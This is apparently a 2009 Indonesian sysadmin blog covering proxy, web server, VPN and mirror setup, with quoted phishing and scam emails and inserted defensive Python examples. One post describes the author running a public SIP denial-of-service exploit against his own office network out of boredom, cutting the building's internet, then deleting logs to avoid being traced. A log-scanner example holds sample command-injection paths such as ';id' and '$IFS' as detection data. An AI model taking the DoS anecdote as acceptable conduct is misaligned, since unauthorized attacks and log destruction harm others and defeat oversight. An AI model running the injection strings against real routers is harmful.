Unlike the already documented CSRF vulnerability (
http://www.securityfocus.com/bid/32703 ) this DOES NOT need an authenticated
session. This means someone can even post some crafted [img] link on a forum
and a dd-wrt router owner visiting the forum will get owned :)


A weird vulnerability you're unlikely to see in 2009 :) Quite embarrassing I
would say :)


Thanks krassyo at krassyo.info for his support :)


Leka vecher :)

# milw0rm.com [2009-07-20]

I wonder how many hotspots there are in Indonesia ... the method is quite easy ... :D and on top of that this ddwrt hole is quite exciting ...
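A defender's view of the request shape described in the advisory, as an added example that is not part of the advisory or of DD-WRT: it scans common-format access-log lines for /cgi-bin/ paths that carry shell metacharacters. It assumes a proxy or IDS in front of the management interface writes such a log; the log lines, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Things a shell interprets; none belongs in the name of a CGI script.
SHELL_TOKENS = [
    (";", "command separator ';'"),
    ("|", "pipe '|'"),
    ("&", "'&' control operator"),
    ("`", "backtick substitution"),
    ("$(", "'$(...)' substitution"),
    ("$IFS", "$IFS standing in for whitespace"),
    ("${", "'${...}' expansion"),
    ("<", "input redirection '<'"),
    (">", "output redirection '>'"),
]

# Common/combined log prefix: src, ident, user, [time], "request", status
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)


def fully_decode(text, max_rounds=3):
    """Percent-decode repeatedly so %3B and %253B both end up as ';'."""
    for _ in range(max_rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def cgi_path_findings(target):
    """Return the reasons a request target looks like shell injection.

    Only the path is inspected: in the quoted httpd.c the path ("file") is
    what gets written into the shell script, while the query string is
    written to a separate file.
    """
    path = fully_decode(target.split("?", 1)[0])
    marker = "/cgi-bin/"
    pos = path.find(marker)
    if pos < 0:
        return []
    tail = path[pos + len(marker):]
    findings = [label for token, label in SHELL_TOKENS if token in tail]
    if re.search(r"\s", tail):
        findings.append("whitespace in script name")
    if ".." in tail.split("/"):
        findings.append("'..' path traversal")
    return findings


def scan(log_text):
    """Return one dict per suspicious log line."""
    hits = []
    for number, line in enumerate(log_text.splitlines(), 1):
        match = LOG_RE.match(line)
        if not match:
            continue
        findings = cgi_path_findings(match.group("target"))
        if findings:
            hits.append({
                "line": number,
                "src": match.group("src"),
                # Do not filter on status: per the advisory the command
                # runs even when the reply is an authentication failure.
                "status": int(match.group("status")),
                "target": match.group("target"),
                "findings": findings,
            })
    return hits


# Constructed sample lines (documentation IP ranges, harmless commands).
SAMPLE_LOG = """\
192.0.2.10 - - [20/Jul/2009:10:00:01 +0700] "GET /cgi-bin/status.cgi?refresh=5&tab=wan HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.11 - - [20/Jul/2009:10:00:07 +0700] "GET /cgi-bin/;id HTTP/1.1" 401 0 "http://forum.example/thread/1" "Mozilla/4.0"
192.0.2.12 - - [20/Jul/2009:10:00:09 +0700] "GET /cgi-bin/%3Becho$IFStest HTTP/1.1" 401 0 "-" "Mozilla/4.0"
192.0.2.13 - - [20/Jul/2009:10:00:12 +0700] "GET /cgi-bin/%253Bid HTTP/1.1" 401 0 "-" "curl/7.19"
192.0.2.14 - - [20/Jul/2009:10:00:15 +0700] "GET /index.asp?next=/cgi-bin/;x HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["line"], hit["src"], hit["status"], hit["target"],
              "; ".join(hit["findings"]))
```

A 401 on a flagged line is not evidence that the request was blocked, which is why the status is reported but never used as a filter.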

nginx proxy

Nginx has proven effective, just as my friend said; this time I will try implementing it .... here is the configuration


#######################################################################
#
# This is the main Nginx configuration file.
#
# More information about the configuration options is available on
# * the English wiki - http://wiki.codemongers.com/Main
# * the Russian documentation - http://sysoev.ru/nginx/
#
#######################################################################

#----------------------------------------------------------------------
# Main Module - directives that cover basic functionality
#
# http://wiki.codemongers.com/NginxMainModule
#
#----------------------------------------------------------------------

user nobody nobody;
worker_processes 2;

error_log /var/log/nginx/error.log;
#error_log /var/log/nginx/error.log notice;
#error_log /var/log/nginx/error.log info;

pid /var/run/nginx.pid;



#----------------------------------------------------------------------
# Events Module
#
# http://wiki.codemongers.com/NginxEventsModule
#
#----------------------------------------------------------------------

events {
    worker_connections 1024;
}


#----------------------------------------------------------------------
# HTTP Core Module
#
# http://wiki.codemongers.com/NginxHttpCoreModule
#
#----------------------------------------------------------------------

http {
    include /etc/nginx/mime.types;
    default_type application/octet-stream;

    log_format main '$remote_addr - $remote_user [$time_local] $request '
                    '"$status" $body_bytes_sent "$http_referer" '
                    '"$http_user_agent" "$http_x_forwarded_for"';

    access_log /var/log/nginx/access.log main;

    sendfile on;
    #tcp_nopush on;
    #tcp_noauth on ;
    #keepalive_timeout 0;
    keepalive_timeout 65;

    gzip on;

    # Load config files from the /etc/nginx/conf.d directory
    include /etc/nginx/conf.d/*.conf;

    #
    # The default server
    #
    server {
        listen 82;
        server_name boc.telkom.net.id ;

        access_log /var/log/nginx/host.access.log main;

        # Main location
        location / {
            proxy_pass http://127.0.0.1:8080/;
            proxy_redirect off;

            proxy_set_header Host $host;
            proxy_set_header X-Real-IP $remote_addr;
            proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

            client_max_body_size 10m;
            client_body_buffer_size 128k;

            proxy_connect_timeout 90;
            proxy_send_timeout 90;
            proxy_read_timeout 90;

            proxy_buffer_size 4k;
            proxy_buffers 4 32k;
            proxy_busy_buffers_size 64k;
            proxy_temp_file_write_size 64k;
        }

        # Static files location
        location ~* ^.+\.(jpg|jpeg|gif|png|ico|css|zip|tgz|gz|rar|bz2|doc|xls|exe|pdf|ppt|txt|tar|mid|midi|wav|bmp|rtf|js)$ {
            root /spool/www/members_ng;
        }

    }
}

download the rpaf module

wget http://stderr.net/apache/rpaf/download/mod_rpaf-0.6.tar.gz

root@boc [~/mod_rpaf-0.6]# more README
mod_rpaf - reverse proxy add forward

This module does the opposite of mod_proxy_add_forward written
by Ask Bjørn Hansen. http://develooper.com/code/mpaf/

Compile and Install for 1.3:

apxs -i -a -c mod_rpaf.c

Compile and Install for 2.0:

apxs -i -c -n mod_rpaf-2.0.so mod_rpaf-2.0.c

or simply try:
make

Configuration Directives:
RPAFenable On
# Enable reverse proxy add forward
RPAFproxy_ips 127.0.0.1 10.0.0.1
# which ips are forwarding requests to us
RPAFsethostname On
# let rpaf update vhost settings
# allows to have the same hostnames as in the "real"
# configuration for the forwarding Apache
RPAFheader X-Forwarded-For
# Allows you to change which header mod_rpaf looks
# for when trying to find the ip the that is forwarding
# our requests



vi /usr/local/apache/conf.d/rpaf.conf


# Path to mod_rpaf-2.0.so, relative to /etc/httpd/
LoadModule rpaf_module modules/mod_rpaf-2.0.so

RPAFenable On
RPAFsethostname On

#Define our reverse proxy IP. Only substitute client IP in
#when we receive a request from this IP.
RPAFproxy_ips 127.0.0.1

# The header where the real client IP address is stored.
RPAFheader X-Forwarded-For

restart httpd , start nginx , and it's running ................

Download Backtrack in Indonesia

This is a new link for downloading backtrack within the Indonesian network; I made this as my contribution as an open source lover ... , greets to http://opensource.telkomspeedy.com

download :

http://repo.opensource.telkomspeedy.com/backtrack/

we hope you enjoy ......

Saturday, July 18, 2009

Fake email ??? or ...

This is how social engineering is done by irresponsible parties, using fake email sent to their victims:

You've received a photo from facebook.com!
Wednesday, July 15, 2009 10:52 AM
From: "facebook.com"
To: artikel@sekuritionline.net


I looked at the headers of the incoming email
================================================================================

Return-Path:
Authentication-Results: mta131.mail.ac4.yahoo.com from=81-15-214-1.wyrzysk.net.pl; domainkeys=neutral (no sig); from=81-15-214-1.wyrzysk.net.pl; dkim=neutral (no sig)
Received: from 127.0.0.1 (EHLO omta0109.mta.everyone.net) (216.200.145.38) by mta131.mail.ac4.yahoo.com with SMTP; Tue, 14 Jul 2009 20:52:34 -0700
Received: from dm0208.mta.everyone.net (sj1-slb03-gw2 [172.16.1.96]) by omta0109.mta.everyone.net (Postfix) with ESMTP id 7B897648A7; Tue, 14 Jul 2009 20:52:33 -0700 (PDT)
Received: from 81-15-214-1.wyrzysk.net.pl (81.15.214.1 [81.15.214.1]) by dm0208.mta.everyone.net (EON-INBOUND) with ESMTP id dm0208.4a4aabf3.7e2b6ae for ; Tue, 14 Jul 2009 20:52:33 -0700
Received: from apache by 81-15-214-1.wyrzysk.net.pl with local (Exim 4.24) id 1MQvXh-0002HU-9z for artikel@sekuritionline.net; Wed, 15 Jul 2009 05:52:29 +0200
To: artikel@sekuritionline.net
Subject: You've received a photo from facebook.com!
From: facebook.com
Content-Type: text/html
Message-Id:
Sender: User for Apache
Date: Wed, 15 Jul 2009 05:52:29 +0200
Content-Length: 944

what shows up is

apache@81-15-214-1.wyrzysk.net.pl

the perpetrator uses this technique to exploit the death of michael jackson, getting the victim to click the link shown, but its extension is exe :)

my advice: be careful with email that arrives in your inbox, and don't carelessly click on the ads in there :)
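The header reading done by hand above, as an added example that is not part of the original post: it walks the Received chain oldest-first and flags mail that was generated locally by a web server account while the From display name claims a brand domain. The Received lines are the ones quoted in the post; the From address is a placeholder because the page does not show it, and the function names and flag names are made up for this example.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# Accounts that web servers commonly run as (assumed list for this example).
WEB_ACCOUNTS = {"apache", "www-data", "httpd", "nobody", "www"}

# Headers from the post; the From address is a constructed placeholder.
SAMPLE_HEADERS = """\
Received: from 127.0.0.1 (EHLO omta0109.mta.everyone.net) (216.200.145.38) by mta131.mail.ac4.yahoo.com with SMTP; Tue, 14 Jul 2009 20:52:34 -0700
Received: from dm0208.mta.everyone.net (sj1-slb03-gw2 [172.16.1.96]) by omta0109.mta.everyone.net (Postfix) with ESMTP id 7B897648A7; Tue, 14 Jul 2009 20:52:33 -0700 (PDT)
Received: from 81-15-214-1.wyrzysk.net.pl (81.15.214.1 [81.15.214.1]) by dm0208.mta.everyone.net (EON-INBOUND) with ESMTP id dm0208.4a4aabf3.7e2b6ae for ; Tue, 14 Jul 2009 20:52:33 -0700
Received: from apache by 81-15-214-1.wyrzysk.net.pl with local (Exim 4.24) id 1MQvXh-0002HU-9z for artikel@sekuritionline.net; Wed, 15 Jul 2009 05:52:29 +0200
To: artikel@sekuritionline.net
Subject: You've received a photo from facebook.com!
From: "facebook.com" <placeholder@example.invalid>
Content-Type: text/html
Sender: User for Apache <apache@81-15-214-1.wyrzysk.net.pl>
Date: Wed, 15 Jul 2009 05:52:29 +0200

(body omitted)
"""


def received_chain(raw_headers):
    """Return the Received hops oldest-first as dicts with from/by/with."""
    msg = message_from_string(raw_headers)
    chain = []
    # Each relay prepends its own line, so the last header is the oldest hop.
    for value in reversed(msg.get_all("Received", [])):
        info = " ".join(value.split()).split(";", 1)[0]  # drop the timestamp
        hop = {}
        for key in ("from", "by", "with"):
            found = re.search(r"(?:^|\s)%s\s+(\S+)" % key, info)
            hop[key] = found.group(1) if found else None
        chain.append(hop)
    return chain


def analyse(raw_headers):
    """Flag signs that the mail came from a script on a web server."""
    msg = message_from_string(raw_headers)
    chain = received_chain(raw_headers)
    origin = chain[0] if chain else {"from": None, "by": None, "with": None}
    origin_host = (origin["by"] or "").lower()
    flags = []

    # "with local" means the message was created on that host, not relayed;
    # in that form the "from" field holds the local account name.
    if (origin["with"] or "").lower() == "local":
        flags.append("local-submission")
        if (origin["from"] or "").lower() in WEB_ACCOUNTS:
            flags.append("webserver-account")

    # A display name that is itself a domain should match where the mail
    # really entered the chain.
    display, _address = parseaddr(msg.get("From", ""))
    brand = display.strip().lower()
    if re.fullmatch(r"[a-z0-9-]+(\.[a-z0-9-]+)+", brand):
        if not (origin_host == brand or origin_host.endswith("." + brand)):
            flags.append("brand-mismatch")

    return {"origin_host": origin_host,
            "origin_account": origin["from"],
            "flags": flags}


if __name__ == "__main__":
    print(analyse(SAMPLE_HEADERS))
```

Only the hops written by the recipient's own provider are fully trustworthy; here the provider's hop records the same host, 81.15.214.1, that the oldest line names.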

just trying //..\\

Bored, looking for something to do, so let's try things out; this afternoon I looked around where I sit, this office is really quiet; I was only testing, with no other intention.

The OSes I use are Linux, based on Ubuntu, and RHEL 5; I remoted into the RHEL 5 machine and, just for fun, ran

http://www.milw0rm.com/exploits/7262

Microsoft Communicator allows remote attackers to cause a denial of service (memory consumption) via a large number of SIP INVITE requests, which trigger the creation of many sessions.

What's more, SIP is in use here; as a result, the internet went down for roughly 1 minute, for the whole building at that, mercy; I didn't forget to delete the logs first for fear of being traced :) , again I was only experimenting and it turned out to work :D , better to look for another idea than to sit around idle

Saturday, June 06, 2009

OpenVpn on Vista

there is a problem with openvpn on vista because

Sun Jun 07 06:19:36 2009 ROUTE: route addition failed using CreateIpForwardEntry: One or more arguments are not correct. [if_index=32]
Sun Jun 07 06:19:36 2009 ROUTE: route addition failed using CreateIpForwardEntry: One or more arguments are not correct. [if_index=32]
Sun Jun 07 06:19:36 2009 ROUTE: route addition failed using CreateIpForwardEntry: One or more arguments are not correct. [if_index=32]
Sun Jun 07 06:19:36 2009 ROUTE: route addition failed using CreateIpForwardEntry: One or more arguments are not correct. [if_index=32]

I looked at the ovpn config and then added ...

route-method exe
route-delay 2


here is the result

OK!
OK!
OK!
OK!
Sun Jun 07 06:25:12 2009 Initialization Sequence Completed

Thursday, May 28, 2009

No sound Ubuntu 9.04 HP Pavilion tx2612AU

This is a howto for getting sound (and keeping the beep) on Ubuntu 9.04 on your tablet PC :D ; I searched Google and there are problems in Jaunty

for me :

1. Pen pointer
2. Sound

for sound I found the solution, here we go

add these lines to /etc/modprobe.d/alsa-base.conf

options snd-hda-intel index=0 model=toshiba position_fix=1
options snd-hda-intel index=0 model=acer


as for point 1 , I'm still working on it ...

Wednesday, May 27, 2009

The nearest Ubuntu repo on the network

Ubuntu Jaunty Jackalope 9.04 has been installed successfully on my tablet pc; now it's just a matter of finding the nearest repo

kambing.ui.edu (UI, Telkom, Indosat, OpenIXP, INHERENT)

# deb http://kambing.ui.edu/ubuntu jaunty main restricted universe multiverse
# deb http://kambing.ui.edu/ubuntu jaunty-updates main restricted universe multiverse
# deb http://kambing.ui.edu/ubuntu jaunty-security main restricted universe multiverse
# deb http://kambing.ui.edu/ubuntu jaunty-backports main restricted universe multiverse
# deb http://kambing.ui.edu/ubuntu jaunty-proposed main restricted universe multiverse

www.foss-id.web.id (Telkom)

# deb http://dl2.foss-id.web.id/ubuntu jaunty main restricted universe multiverse
# deb http://dl2.foss-id.web.id/ubuntu jaunty-updates main restricted universe multiverse
# deb http://dl2.foss-id.web.id/ubuntu jaunty-security main restricted universe multiverse
# deb http://dl2.foss-id.web.id/ubuntu jaunty-backports main restricted universe multiverse
# deb http://dl2.foss-id.web.id/ubuntu jaunty-proposed main restricted universe multiverse

mirror.cbn.net.id (OpenIXP)

deb http://ubuntu.cbn.net.id/Ubuntu jaunty main restricted universe multiverse
deb http://ubuntu.cbn.net.id/Ubuntu jaunty-updates main restricted universe multiverse
deb http://ubuntu.cbn.net.id/Ubuntu jaunty-security main restricted universe multiverse
deb http://ubuntu.cbn.net.id/Ubuntu jaunty-backports main restricted universe multiverse
deb http://ubuntu.cbn.net.id/Ubuntu jaunty-proposed main restricted universe multiverse

ftp.itb.ac.id (ITB, INHERENT)

# deb ftp://ftp.itb.ac.id/pub/ubuntu jaunty main restricted universe multiverse
# deb ftp://ftp.itb.ac.id/pub/ubuntu jaunty-updates main restricted universe multiverse
# deb ftp://ftp.itb.ac.id/pub/ubuntu jaunty-security main restricted universe multiverse
# deb ftp://ftp.itb.ac.id/pub/ubuntu jaunty-backports main restricted universe multiverse
# deb ftp://ftp.itb.ac.id/pub/ubuntu jaunty-proposed main restricted universe multiverse

komo.vlsm.org

deb http://komo.vlsm.org/ubuntu jaunty main restricted universe multiverse
deb http://komo.vlsm.org/ubuntu jaunty-updates main restricted universe multiverse
deb http://komo.vlsm.org/ubuntu jaunty-security main restricted universe multiverse
deb http://komo.vlsm.org/ubuntu jaunty-backports main restricted universe multiverse
deb http://komo.vlsm.org/ubuntu jaunty-proposed main restricted universe multiverse

pinged all of them, and in the end the lowest ms went to foss id

www.foss-id.web.id (Telkom)

# deb http://dl2.foss-id.web.id/ubuntu jaunty main restricted universe multiverse
# deb http://dl2.foss-id.web.id/ubuntu jaunty-updates main restricted universe multiverse
# deb http://dl2.foss-id.web.id/ubuntu jaunty-security main restricted universe multiverse
# deb http://dl2.foss-id.web.id/ubuntu jaunty-backports main restricted universe multiverse
# deb http://dl2.foss-id.web.id/ubuntu jaunty-proposed main restricted universe multiverse

So go hit that local repository; my amd-x2 also runs fine with i386, I prefer 386 so development is easier

Thursday, May 21, 2009

Push Adrenalin

Exactly 1 a.m., the ticking of the clock sounded like it was calling me to sleep, but I could not sleep just yet; I had to update the kernel on a server, not because someone asked me to but because I wanted to myself -

what I did:

1. Made sure the applications were updated

2. Rebooted the server

Huh, the server did not come up; wow, high pressure, thousands of game players could come protesting … , waiting …

exactly 2 a.m. I became a Balanar … texting here and there, coordinating with the parties involved …

wuihhhhhh, goodness, texting in the middle of the night, an adrenalin push .. stayed patient until 8 in the morning, tried phoning again, done !!!

Escalated the outage, more phone calls here and there, Done !!!

If only the server were in front of my eyes I would bring it up myself; unfortunately it goes through the existing remote system

Coordinated with an old friend and it worked …. back again ..

12.30 in the afternoon, still not slept, waiting …. and Alhamdulillah it is UP … nearly got protested by thousands of game players :) , I thought the server had collapsed, but it turned out the reboot process had not completed cleanly so the process got stuck …

At 1.00 the server was brought back up, started services here and there …. success …

The adrenalin push was really something, high pressure, wonderful … an experience beyond anything before :)

Multitasking and Analysis

Today I came to the office late and the work was queued up quite a bit, like queuing for staple food; opened the cupboard and took out the war gear. First thing done: installed a network intrusion detection application ( www.snort.com ), finished in 4 hours; after that prepared a streaming server for an event, installed the awstats statistics counter, tested bandwidth, finished in 5 hours; in the afternoon cpanel went down, boom, database error; no wonder it went down :

> File upload is limited to 8 MB = 1 user uploads 8 MB; with 20 users the result is 8×20 = 160 MB , and so on

> Cpanel simply cannot be used for file sharing, let alone for streaming songs

> A new server allocation is needed, a dedicated server with large storage capacity, alongside the existing cluster

> The proxy cache can be nginx , or squid as a load balancer with the round robin method

finished at 5, time to go home; idly opened www.bhinneka.com wanting to snap something up … yummy …

This Friday I can't wait to play with snort IDS … but I'm still unsure where to find an open source IPS; hmm, why am I thinking of reading up on routers, it's been a long time since I left that toy behind …

Silencer ….

… the weekend is awkward, Thursday … and Friday is squeezed in by the national holiday

early morning … back up the laptop data first …

12 midnight ……..

Truly National Awakening Day, 20 May 2009 hhihihihi :)

Tuesday, April 14, 2009

Lighttpd

No need for very formal wording, right ... so, opensource.telkomspeedy.com is getting rather heavy because of how many people download from this site, so in the end let's just try lighttpd; here are the steps :).


Install Lighttpd

1. yum install lighttpd

Install package Lighttpd - FastCGI

2. yum install lighttpd-fastcgi php-cli

Configure Lighttpd and PHP5

3. vi /etc/php.ini

add

[...]
cgi.fix_pathinfo = 1

Uncomment mod_fastcgi

4. vi /etc/lighttpd/lighttpd.conf

original

[...]
server.modules = (
# "mod_rewrite",
# "mod_redirect",
# "mod_alias",
"mod_access",
# "mod_cml",
# "mod_trigger_b4_dl",
# "mod_auth",
# "mod_status",
# "mod_setenv",
# "mod_fastcgi",
# "mod_proxy",
# "mod_simple_vhost",
# "mod_evhost",
# "mod_userdir",
# "mod_cgi",
# "mod_compress",
# "mod_ssi",
# "mod_usertrack",
# "mod_expire",
# "mod_secdownload",
# "mod_rrdtool",
"mod_accesslog" )
[...]

changed to

[...]
server.modules = (
# "mod_rewrite",
# "mod_redirect",
# "mod_alias",
"mod_access",
# "mod_cml",
# "mod_trigger_b4_dl",
# "mod_auth",
# "mod_status",
# "mod_setenv",
"mod_fastcgi",
# "mod_proxy",
# "mod_simple_vhost",
# "mod_evhost",
# "mod_userdir",
# "mod_cgi",
# "mod_compress",
# "mod_ssi",
# "mod_usertrack",
# "mod_expire",
# "mod_secdownload",
# "mod_rrdtool",
"mod_accesslog" )
[...]

then

don't forget to uncomment fastcgi.server as well

original

[...]
#### fastcgi module
## read fastcgi.txt for more info
## for PHP don't forget to set cgi.fix_pathinfo = 1 in the php.ini
#fastcgi.server = ( ".php" =>
# ( "localhost" =>
# (
# "socket" => "/var/run/lighttpd/php-fastcgi.socket",
# "bin-path" => "/usr/bin/php-cgi"
# )
# )
# )
[...]


result

[...]
#### fastcgi module
## read fastcgi.txt for more info
## for PHP don't forget to set cgi.fix_pathinfo = 1 in the php.ini
fastcgi.server = ( ".php" =>
( "localhost" =>
(
"socket" => "/var/run/lighttpd/php-fastcgi.socket",
"bin-path" => "/usr/bin/php-cgi"
)
)
)
[...]

at this point, since there are many files to list for download, just uncomment this

original
#dir-listing.activate = "enable"

result

dir-listing.activate = "enable"

and it works ..........

go grab ubuntu ....

http://opensource.telkomspeedy.com/ubuntu/

Name Last Modified Size Type
Parent Directory/ - Directory
.temp/ 2008-Dec-12 17:47:59 - Directory
debiandvd/ 2009-Mar-29 02:29:30 - Directory
dists/ 2008-Dec-19 01:01:12 - Directory
pool/ 2007-Jun-21 11:03:40 - Directory
project/ 2004-Jun-15 21:21:17 - Directory

lighttpd/1.4.20

Friday, March 06, 2009

Peeking at the underwear .......

Can we actually read which IP is accessing through squid? We can ...

provided that squid has :

forwarded_for On

config in http :

LogFormat "%{X-Forwarded-For}i %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" X-Forwarded-For

CustomLog logs/X-Forwarded-For_log X-Forwarded-For

view the log :

tail -f /var/log/httpd/X-Forwarded-For_log

generate awstats :

read and check carefully :

LogFile="/var/log/httpd/X-Forwarded-For_log"

LogFormat=1


[26][in][my][old]
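Both the nginx + mod_rpaf setup earlier on this page and the Squid forwarded_for logging above rely on X-Forwarded-For, a header the client can also set itself. The block below is an added example, not mod_rpaf's or Apache's own code: it resolves the address to attribute a request to by walking the header from the right and trusting only hops added by known proxies, the same role RPAFproxy_ips plays. The function names and sample requests are constructed for illustration.

```python
import ipaddress


def resolve_client_ip(peer_ip, xff_header, trusted_proxies):
    """Return the address a request should be attributed to.

    peer_ip         -- TCP peer as seen by the backend
    xff_header      -- raw X-Forwarded-For value, or None
    trusted_proxies -- IPs/CIDRs of our own proxies (cf. RPAFproxy_ips)
    """
    trusted = [ipaddress.ip_network(p, strict=False) for p in trusted_proxies]

    def is_trusted(ip):
        return any(ip in net for net in trusted)

    peer = ipaddress.ip_address(peer_ip)
    # A header sent by anything other than our own proxy proves nothing.
    if not is_trusted(peer) or not xff_header:
        return str(peer)

    hops = [h.strip() for h in xff_header.split(",") if h.strip()]
    candidate = peer
    # Each proxy appends the address it saw, so the rightmost entries are the
    # ones our own proxies wrote; everything left of the first untrusted
    # address is client-supplied text.
    for hop in reversed(hops):
        try:
            ip = ipaddress.ip_address(hop)
        except ValueError:
            break  # not an address: stop at the last value we could verify
        candidate = ip
        if not is_trusted(ip):
            break
    return str(candidate)


def naive_leftmost(peer_ip, xff_header):
    """What a log reader gets when it blindly takes the first header value."""
    if not xff_header:
        return peer_ip
    return xff_header.split(",")[0].strip()


# Same shape as the README example: RPAFproxy_ips 127.0.0.1 10.0.0.1
TRUSTED = ["127.0.0.1", "10.0.0.1"]

# Constructed requests: (label, TCP peer, X-Forwarded-For as received).
SAMPLE_REQUESTS = [
    ("normal request through nginx", "127.0.0.1", "203.0.113.7"),
    # Client sent its own header; $proxy_add_x_forwarded_for appended to it.
    ("client pre-set the header", "127.0.0.1", "10.10.10.10, 203.0.113.7"),
    # Assumes the backend port is reachable without going through the proxy.
    ("direct hit on the backend", "198.51.100.9", "127.0.0.1"),
    ("non-address value in header", "127.0.0.1", "unknown, 203.0.113.8"),
    ("two trusted proxies in a row", "127.0.0.1", "192.0.2.55, 10.0.0.1"),
]


def audit(requests, trusted):
    """Return (label, naive value, resolved value) for each request."""
    return [
        (label, naive_leftmost(peer, xff), resolve_client_ip(peer, xff, trusted))
        for label, peer, xff in requests
    ]


if __name__ == "__main__":
    for label, naive, resolved in audit(SAMPLE_REQUESTS, TRUSTED):
        note = "" if naive == resolved else "  <-- differs"
        print("%-30s naive=%-12s resolved=%s%s" % (label, naive, resolved, note))
```

Rows where the two values differ are the ones where a log keyed on the raw header would record an address chosen by the client.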

Wednesday, February 25, 2009

Luckily it was similar

Huaaaaaaammm , because of one system I ended up having to be a night owl again, like a kid, huh .... but it's fine, what matters is that it worked and in the end all the data and the rhel 5 service ( cpanel hosting hehehehehehe ) were rescued again ..........

going to sleep now, ahhh, whatever, if I come in late tomorrow then I come in late ....

Friday, February 20, 2009

A messy router !!!! he3x

This is what it's like comparing Layer 7 with Layer 3; in my opinion layer 7 is harder because it can be application-based, but since what I tried was a router ...

how vulnerable the communication path is that runs over the transmission link up to the gateway router ... I once compared and looked at a configuration that in my opinion was far from simple, whether out of laziness to install an access list or to merely restrict Privilege on the way to super user ( # ); don't use passwords that are too easy, if necessary combine characters that are hard to guess :D , port 23 gets hammered by intruders, and keep up diligently with security developments around the world ...

Monday, February 16, 2009

Whoa There ................

SolarWinds.net, Inc. <-- this is the dashboard used for monitoring the servers; in the day-to-day work, counting them up, it turns out ....... 30 servers :D and all of them must be hardened and checked diligently, that's a lot ... all of them go into iix directly over FO .... huh ???? interested ??????

Wednesday, February 11, 2009

The Musician ( Intermezzo )

Maybe here I'll just share about this one friend of mine; I don't know what made him like this. We were music lovers back in high school, and I myself even dreamed of becoming a musician. In the 2nd year of high school this band was formed, and we got to play music shows here and there, but this friend was the most fired up when it came to music. Even so, there was a funny side to him: during history class, this friend was engrossed in reading his music book even though it was history period; I myself paid attention, although sometimes I drifted out of control from the lesson, until the teacher happened to see what this friend of mine was doing ...

History Teacher : Hey you, Adi, answer my question ....... ( packet data )
Adi : Looking left and right like a chick that has lost its mother.
History Teacher : Whenever you are asked a question you always look confused ...
Adi : eh guys, what was the question ( Adi asking my friends )
Friends : that's why you should pay attention ( Sniff ) when you're asked a question; the teacher just asked who the current president of RI is ( this friend's antics really were something )
Me : holding back laughter ........
Adi : Immediately shouted Habibi, siiiiiiiiiir
Friends : All laughing half to death ....

Adi : yes sir, Habibi of course, while pointing at the photo at the front ( it happened to be the period after the 1997 riots )

History Teacher : hahahahah even a small child knows that ....

this is the incident I remember, how funny this friend of mine was ... as if his brain had just been hit by a prolonged trino.tar.gz .......

Friday, February 06, 2009

You are just Lamers !!!

Yet again lots of phishing, scam tricks .... filling up my inbox ....

Dear Friend,

My name is Mr.Henry Mazak,supervisory Manager in the United Bank for Africa(UBA),Ouagadougou,Burkina Faso,West Africa. I have a business Deal worth of Seventeen Million,Five hundred Thousand U.S. Dollars and I need your assistance in executing this business from my country and investing in your country.

Please reply back to me immediately if you are interested so that i can send you more details of this transaction.

Thank you for your time and i look forward to working with you.

Yours,
Mr.Henry Mazak

you are just a lamer ...

scam tricks ...... spam here and there ... that is lame ... :D , repent ... come back to the right path ...

Tuesday, February 03, 2009

VIM Cheat

Who says the VIM editor on linux has no cheat sheet, as if it were an exam .. here .... the cheat sheet .........

when Google went haywire ....

Try reading this ..........

"This site may harm your computer" on every search result?!?!

If you did a Google search between 6:30 a.m. PST and 7:25 a.m. PST this morning, you likely saw that the message "This site may harm your computer" accompanied each and every search result. This was clearly an error, and we are very sorry for the inconvenience caused to our users.

What happened? Very simply, human error. Google flags search results with the message "This site may harm your computer" if the site is known to install malicious software in the background or otherwise surreptitiously. We do this to protect our users against visiting sites that could harm their computers. We maintain a list of such sites through both manual and automated methods. We work with a non-profit called StopBadware.org to come up with criteria for maintaining this list, and to provide simple processes for webmasters to remove their site from the list.

We periodically update that list and released one such update to the site this morning. Unfortunately (and here's the human error), the URL of '/' was mistakenly checked in as a value to the file and '/' expands to all URLs. Fortunately, our on-call site reliability team found the problem quickly and reverted the file. Since we push these updates in a staggered and rolling fashion, the errors began appearing between 6:27 a.m. and 6:40 a.m. and began disappearing between 7:10 and 7:25 a.m., so the duration of the problem for any particular user was approximately 40 minutes.

Thanks to our team for their quick work in finding this. And again, our apologies to any of you who were inconvenienced this morning, and to site owners whose pages were incorrectly labelled. We will carefully investigate this incident and put more robust file checks in place to prevent it from happening again.

Thanks for your understanding.

Update at 10:29 am PST: This post was revised as more precise information became available (changes are in blue). Here's StopBadware's explanation.

Posted by Marissa Mayer, VP, Search Products & User Experience

...

Yesterday, while I was setting up a vpn, and in the end I had to lie flat at home all of this Monday; ok, next, here is the chronology: I took a moment to open google and the results all pointed to stopbadware as if hit by malware ... that night I was chatting with my friend in Bandung, bro ian; I thought maybe google had been hit by some kind of virus attack ... but it turned out ....

it was identified as human error ... humans created it, so of course there are mistakes too ... the write-up is above

or maybe a lot of google employees got laid off ........ so it's some kind of conspiracy ... who knows !!!!

here's an additional link

http://blog.stopbadware.org/2009/01/31/google-glitch-causes-confusion

Monday, February 02, 2009

In The Darkness ....






Today I idly captured the laptop fan .... after taking leave all day ... well, because I was sick, and now I'm feeling better ...

Sunday, February 01, 2009

Openvpn.net

There's something interesting about openvpn; I got to see a friend using this vpn, quite convenient, especially since I work in operations, handling faults, both the visible and the invisible ones ( what, a genderuwo ? ) ...



Ok, installing openvpn is actually easy

The logic goes like this

connect to server -- accept route - masquerade on eth1 towards the inside ,

the steps :

install webmin so it's not a hassle
install the webmin vpn module

when about to create the Certification Authority List

in the fields, entering State : DKI , City : DKI does not work, there is still a bug <--- haven't had time to look into it
need to long 2 byte character, if I'm not mistaken

in the end forced to use the default state US : city : newyork ( hehehe, so stylish )

enter server - client access ....

ugh : not feeling well ... writing just the bare minimum, want to go to bed early ....

Thursday, January 29, 2009

NFS - original - addition - result

#vi /etc/fstab

original
